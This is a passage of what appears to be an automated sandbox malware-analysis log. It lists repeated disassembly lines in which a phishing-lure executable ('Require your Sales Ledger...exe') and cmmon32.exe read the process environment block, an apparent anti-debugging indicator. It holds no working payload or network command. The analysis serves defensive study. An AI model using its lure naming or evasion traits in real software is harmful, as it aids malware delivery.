Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h] 24_2_011FAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FAA16 mov eax, dword ptr fs:[00000030h] 24_2_011FAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h] 24_2_01234A2C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01234A2C mov eax, dword ptr fs:[00000030h] 24_2_01234A2C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov ecx, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F5210 mov eax, dword ptr fs:[00000030h] 24_2_011F5210
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01208A0A mov eax, dword ptr fs:[00000030h] 24_2_01208A0A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01213A1C mov eax, dword ptr fs:[00000030h] 24_2_01213A1C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h] 24_2_012BAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BAA16 mov eax, dword ptr fs:[00000030h] 24_2_012BAA16
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h] 24_2_012AB260
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AB260 mov eax, dword ptr fs:[00000030h] 24_2_012AB260
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8A62 mov eax, dword ptr fs:[00000030h] 24_2_012C8A62
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0123927A mov eax, dword ptr fs:[00000030h] 24_2_0123927A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9240 mov eax, dword ptr fs:[00000030h] 24_2_011F9240
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BEA55 mov eax, dword ptr fs:[00000030h] 24_2_012BEA55
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01284257 mov eax, dword ptr fs:[00000030h] 24_2_01284257
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h] 24_2_0120AAB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120AAB0 mov eax, dword ptr fs:[00000030h] 24_2_0120AAB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122FAB0 mov eax, dword ptr fs:[00000030h] 24_2_0122FAB0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h] 24_2_0122D294
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122D294 mov eax, dword ptr fs:[00000030h] 24_2_0122D294
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F52A5 mov eax, dword ptr fs:[00000030h] 24_2_011F52A5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222AE4 mov eax, dword ptr fs:[00000030h] 24_2_01222AE4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222ACB mov eax, dword ptr fs:[00000030h] 24_2_01222ACB
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0127A537 mov eax, dword ptr fs:[00000030h] 24_2_0127A537
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BE539 mov eax, dword ptr fs:[00000030h] 24_2_012BE539
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01203D34 mov eax, dword ptr fs:[00000030h] 24_2_01203D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8D34 mov eax, dword ptr fs:[00000030h] 24_2_012C8D34
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h] 24_2_01224D3B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h] 24_2_01224D3B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224D3B mov eax, dword ptr fs:[00000030h] 24_2_01224D3B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FAD30 mov eax, dword ptr fs:[00000030h] 24_2_011FAD30
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h] 24_2_0121C577
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121C577 mov eax, dword ptr fs:[00000030h] 24_2_0121C577
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01233D43 mov eax, dword ptr fs:[00000030h] 24_2_01233D43
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01273540 mov eax, dword ptr fs:[00000030h] 24_2_01273540
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012A3D40 mov eax, dword ptr fs:[00000030h] 24_2_012A3D40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01217D50 mov eax, dword ptr fs:[00000030h] 24_2_01217D50
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h] 24_2_012C05AC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C05AC mov eax, dword ptr fs:[00000030h] 24_2_012C05AC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012235A1 mov eax, dword ptr fs:[00000030h] 24_2_012235A1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F2D8A mov eax, dword ptr fs:[00000030h] 24_2_011F2D8A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h] 24_2_01221DB5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h] 24_2_01221DB5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01221DB5 mov eax, dword ptr fs:[00000030h] 24_2_01221DB5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222581 mov eax, dword ptr fs:[00000030h] 24_2_01222581
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h] 24_2_0122FD9B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122FD9B mov eax, dword ptr fs:[00000030h] 24_2_0122FD9B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h] 24_2_0120D5E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120D5E0 mov eax, dword ptr fs:[00000030h] 24_2_0120D5E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BFDE2 mov eax, dword ptr fs:[00000030h] 24_2_012BFDE2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012A8DF1 mov eax, dword ptr fs:[00000030h] 24_2_012A8DF1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov ecx, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276DC9 mov eax, dword ptr fs:[00000030h] 24_2_01276DC9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122BC2C mov eax, dword ptr fs:[00000030h] 24_2_0122BC2C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h] 24_2_012C740D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h] 24_2_012C740D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C740D mov eax, dword ptr fs:[00000030h] 24_2_012C740D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1C06 mov eax, dword ptr fs:[00000030h] 24_2_012B1C06
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276C0A mov eax, dword ptr fs:[00000030h] 24_2_01276C0A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121746D mov eax, dword ptr fs:[00000030h] 24_2_0121746D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A44B mov eax, dword ptr fs:[00000030h] 24_2_0122A44B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128C450 mov eax, dword ptr fs:[00000030h] 24_2_0128C450
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120849B mov eax, dword ptr fs:[00000030h] 24_2_0120849B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B14FB mov eax, dword ptr fs:[00000030h] 24_2_012B14FB
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01276CF0 mov eax, dword ptr fs:[00000030h] 24_2_01276CF0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8CD6 mov eax, dword ptr fs:[00000030h] 24_2_012C8CD6
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122E730 mov eax, dword ptr fs:[00000030h] 24_2_0122E730
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C070D mov eax, dword ptr fs:[00000030h] 24_2_012C070D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A70E mov eax, dword ptr fs:[00000030h] 24_2_0122A70E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F4F2E mov eax, dword ptr fs:[00000030h] 24_2_011F4F2E
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121F716 mov eax, dword ptr fs:[00000030h] 24_2_0121F716
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128FF10 mov eax, dword ptr fs:[00000030h] 24_2_0128FF10
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120FF60 mov eax, dword ptr fs:[00000030h] 24_2_0120FF60
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8F6A mov eax, dword ptr fs:[00000030h] 24_2_012C8F6A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120EF40 mov eax, dword ptr fs:[00000030h] 24_2_0120EF40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277794 mov eax, dword ptr fs:[00000030h] 24_2_01277794
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01208794 mov eax, dword ptr fs:[00000030h] 24_2_01208794
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012337F5 mov eax, dword ptr fs:[00000030h] 24_2_012337F5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AFE3F mov eax, dword ptr fs:[00000030h] 24_2_012AFE3F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FC600 mov eax, dword ptr fs:[00000030h] 24_2_011FC600
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01228E00 mov eax, dword ptr fs:[00000030h] 24_2_01228E00
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B1608 mov eax, dword ptr fs:[00000030h] 24_2_012B1608
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A61C mov eax, dword ptr fs:[00000030h] 24_2_0122A61C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FE620 mov eax, dword ptr fs:[00000030h] 24_2_011FE620
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120766D mov eax, dword ptr fs:[00000030h] 24_2_0120766D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121AE73 mov eax, dword ptr fs:[00000030h] 24_2_0121AE73
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01207E41 mov eax, dword ptr fs:[00000030h] 24_2_01207E41
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012BAE44 mov eax, dword ptr fs:[00000030h] 24_2_012BAE44
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012746A7 mov eax, dword ptr fs:[00000030h] 24_2_012746A7
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C0EA5 mov eax, dword ptr fs:[00000030h] 24_2_012C0EA5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128FE87 mov eax, dword ptr fs:[00000030h] 24_2_0128FE87
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012216E0 mov ecx, dword ptr fs:[00000030h] 24_2_012216E0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012076E2 mov eax, dword ptr fs:[00000030h] 24_2_012076E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01238EC7 mov eax, dword ptr fs:[00000030h] 24_2_01238EC7
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AFEC0 mov eax, dword ptr fs:[00000030h] 24_2_012AFEC0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012236CC mov eax, dword ptr fs:[00000030h] 24_2_012236CC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8ED6 mov eax, dword ptr fs:[00000030h] 24_2_012C8ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98CD6 mov eax, dword ptr fs:[00000030h] 32_2_04D98CD6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D814FB mov eax, dword ptr fs:[00000030h] 32_2_04D814FB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46CF0 mov eax, dword ptr fs:[00000030h] 32_2_04D46CF0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD849B mov eax, dword ptr fs:[00000030h] 32_2_04CD849B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA44B mov eax, dword ptr fs:[00000030h] 32_2_04CFA44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5C450 mov eax, dword ptr fs:[00000030h] 32_2_04D5C450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE746D mov eax, dword ptr fs:[00000030h] 32_2_04CE746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9740D mov eax, dword ptr fs:[00000030h] 32_2_04D9740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81C06 mov eax, dword ptr fs:[00000030h] 32_2_04D81C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46C0A mov eax, dword ptr fs:[00000030h] 32_2_04D46C0A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFBC2C mov eax, dword ptr fs:[00000030h] 32_2_04CFBC2C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov ecx, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D46DC9 mov eax, dword ptr fs:[00000030h] 32_2_04D46DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D78DF1 mov eax, dword ptr fs:[00000030h] 32_2_04D78DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDD5E0 mov eax, dword ptr fs:[00000030h] 32_2_04CDD5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8FDE2 mov eax, dword ptr fs:[00000030h] 32_2_04D8FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC2D8A mov eax, dword ptr fs:[00000030h] 32_2_04CC2D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2581 mov eax, dword ptr fs:[00000030h] 32_2_04CF2581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFFD9B mov eax, dword ptr fs:[00000030h] 32_2_04CFFD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF35A1 mov eax, dword ptr fs:[00000030h] 32_2_04CF35A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D905AC mov eax, dword ptr fs:[00000030h] 32_2_04D905AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF1DB5 mov eax, dword ptr fs:[00000030h] 32_2_04CF1DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D03D43 mov eax, dword ptr fs:[00000030h] 32_2_04D03D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D43540 mov eax, dword ptr fs:[00000030h] 32_2_04D43540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D73D40 mov eax, dword ptr fs:[00000030h] 32_2_04D73D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE7D50 mov eax, dword ptr fs:[00000030h] 32_2_04CE7D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEC577 mov eax, dword ptr fs:[00000030h] 32_2_04CEC577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8E539 mov eax, dword ptr fs:[00000030h] 32_2_04D8E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D4A537 mov eax, dword ptr fs:[00000030h] 32_2_04D4A537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98D34 mov eax, dword ptr fs:[00000030h] 32_2_04D98D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF4D3B mov eax, dword ptr fs:[00000030h] 32_2_04CF4D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD3D34 mov eax, dword ptr fs:[00000030h] 32_2_04CD3D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCAD30 mov eax, dword ptr fs:[00000030h] 32_2_04CCAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF36CC mov eax, dword ptr fs:[00000030h] 32_2_04CF36CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98ED6 mov eax, dword ptr fs:[00000030h] 32_2_04D98ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D7FEC0 mov eax, dword ptr fs:[00000030h] 32_2_04D7FEC0
